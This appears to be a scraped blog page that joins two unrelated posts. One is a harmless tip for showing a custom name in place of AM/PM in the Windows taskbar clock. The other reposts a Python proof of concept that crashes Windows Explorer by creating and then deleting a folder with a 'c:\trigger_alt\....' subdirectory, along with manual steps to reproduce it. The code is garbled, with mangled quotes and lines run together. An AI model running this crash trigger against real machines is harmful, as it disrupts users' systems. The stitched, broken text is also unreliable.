Trick to Show Your name after time in taskbar

Try this trick to add up ur name in place of AM and PM beside time.
Its simple:
Step-1:
– Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok …

Did It change?
If not, follow step-2 below.
Step2:
– Now go to time in taskbar and Double Click it to open “Date and time property” …
Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Windows Explorer Denial Of Service (DoS)

# Windows 2008 SP2 RC2 Explorer Go Byebye 😛
# Windows 7 Pro SP1 Explorer Go Byebye 😛
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stackfrom win32com.shell import shell, shellcon from os import mkdirtry:
mkdir(“c:\\trigger_alt”)
except:
print “[!] Trigger Directory Exists”try:mkdir(“c:\\trigger_alt\\….”)
except:
print “[!] Trigger Sub Directory Exists”print “[!] Triggering Issue”
# This moves the directory containing the sub directory which creates the # The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ….\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,’c:\\trigger_alt’,None,shellcon.FOF_NOCONFIRMATION))

# Download The txt here.

# Source.